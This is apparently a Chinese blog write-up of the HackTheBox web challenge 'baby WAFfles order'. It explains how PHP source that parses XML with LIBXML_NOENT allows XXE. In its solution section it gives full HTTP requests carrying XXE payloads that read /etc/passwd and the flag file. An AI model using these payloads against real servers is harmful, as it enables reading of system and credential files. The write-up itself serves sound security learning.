HackTheBox-baby WAFfles order

最新推荐文章于 2024-09-17 09:47:36 发布
最新推荐文章于 2024-09-17 09:47:36 发布
阅读量8.3k 收藏
点赞数 1
分类专栏: # Web 文章标签: web安全 php 靶机 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122594770
版权

文章目录

概述

HackTheBox 网站CTF靶场Web相关题目baby WAFfles order,题目地址https://app.hackthebox.com/challenges/baby-waffles-order,主要考察PHP源代码审计和XXE漏洞的利用。

在这里插入图片描述

题目

题目概述

题目提供了附件下载,解压后如下图
在这里插入图片描述

开启程序实例后,提示访问178.62.19.68:31341

访问http://178.62.19.68:31341为一个订单页面,尝试提交,在火狐开发工具查看

在这里插入图片描述

在burp中重放,可以看到是以JSON格式进行信息交互
在这里插入图片描述
查看附件提供的源代码index.php

<?php
spl_autoload_register(function ($name){
    if (preg_match('/Controller$/', $name))
    {
        $name = "controllers/${name}";
    }
    include_once "${name}.php";
});

$router = new Router();

$router->new('GET', '/', fn($router) => $router->view('menu'));
$router->new('POST', '/api/order', 'OrderController@order');

die($router->match());

继而定位到OrderController.php,可以看到除了支持JSON解析,还支持XML解析,其对应的代码为

        else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
        {
            $order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);
            if (!$order->food) return 'You need to select a food option first';
            return "Your {$order->food} order has been submitted successfully.";
        }
        else
        {
            return $router->abort(400);
        }

题目解法

修改为xml发包,成功得到passwd的内容

POST /api/order HTTP/1.1
Host: 178.62.19.68:31341
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://178.62.19.68:31341/
Content-Type: application/xml
Origin: http://178.62.19.68:31341
Connection: keep-alive
X-Forwarded-For: 220.181.38.150
Content-Length: 140

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order>
    <food>&xxe;</food>
</order>

在这里插入图片描述

根据附件文件结构,知道flag文件为flag,修改内容为

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag"> ]>
<order>
    <food>&xxe;</food>
</order>

在这里插入图片描述

成功读取flag

galaxy3000
关注
专栏目录
Waffles-开源
04-27
广泛的命令行界面工具集合,用于执行机器学习操作。 每个工具都是围绕着文档齐全的C ++类库中的功能的一个薄薄的包装。 华夫饼工具旨在简单,易于编写脚本并能够
HTB-baby~
TA不懒,但还没有添加简介
03-31 278
HTB-baby~
Waffles-Search-Engine
03-21
灵感很多人有很多善良的奉献。但是,并不是每个人都知道他们想如何帮助世界。他们是否要争取妇女权利,消除世界饥饿或停止战争,可能性是无限的。甚至在发现之后,确实引起正义的基于非营利组织的基金会本身就是另一...
Waffles-RTX-Engine
03-05
Vulkan射线追踪 如何使用: 由于vulkans sdk的大小太大,因此在克隆时必须更改makefile,以使VULKAN_ROOT指向您的sdk位置。 例如:C:/VulkanSDK/1.2.xxx.x/
waffles-tutorial:华夫饼网格系统使用教程
06-06
华夫饼教程 使用华夫饼网格系统的教程。 开始吧 > npm install > gulp build && gulp watch 然后访问 [http://localhost:8080] 看看它是什么。
华夫饼堆栈:华夫饼堆栈-
02-05
Stack-O-Waffles-master是这个项目的源代码仓库名称,通常在GitHub等版本控制平台上,开发者会将代码存储在这样的仓库中,以便于协作和版本控制。通过分析和研究这个仓库中的代码,我们可以深入理解华夫饼堆栈是如何...
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2807
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 449
y0usef靶机渗透实例
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 765
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-14 1094
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 859
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)
YueXuan_521的博客
09-14 996
这篇文章是关于网络安全DVWA(Damn Vulnerable Web Application)的SQL注入挑战指南,主要介绍了Low、Medium、High和Impossible四个安全级别的SQL盲注攻击方法。Low级别通过直接构造SQL语句获取数据库信息;Medium级别使用ASCII码值绕过单引号转义;High级别使用布尔盲注和Cookie传参,并有限制查询结果;Impossible级别通过参数化查询和CSRF令牌防御SQL注入。文章详细展示了攻击步骤和防御措施,帮助读者理解
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1712
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 1108
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
Web安全与网络安全:SQL漏洞注入
hong161688的博客
09-10 940
Web安全领域,SQL注入漏洞(SQL Injection Vulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行详细阐述。
2024世界技能大赛某省选拔赛“网络安全项目”B模块--数字取证解析②(超详细~)
Aluxian_的博客
09-13 342
现在,A 集团已遭受来自不明组织的非法恶意攻击,您的团队需要帮助 A 集团追踪此网络攻击来源,分析恶意攻击攻击行为的证据线索,找出操作系统和应用程序中的漏洞或者恶意代码,帮助其巩固网络安全防线。A 集团的 WebServer 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系 统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行 全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为, 和残留的关键证据信息。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-08 1856
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全 | 代码审计】PHP无参数RCE
最新发布
等风来
09-17 519
一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。
用伟福斯写出用汇编代码写出来比较两个字符串是否相同,把结果存在一个字节里,0代表不用,1代表相同
06-11
好的,以下是使用微软的MASM汇编器和伟福斯(Waffles)库实现比较两个字符串是否相同的代码,结果存在一个字节变量 `result` 中,0代表不同,1代表相同: ``` .386 .model flat, stdcall .stack 4096 include ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值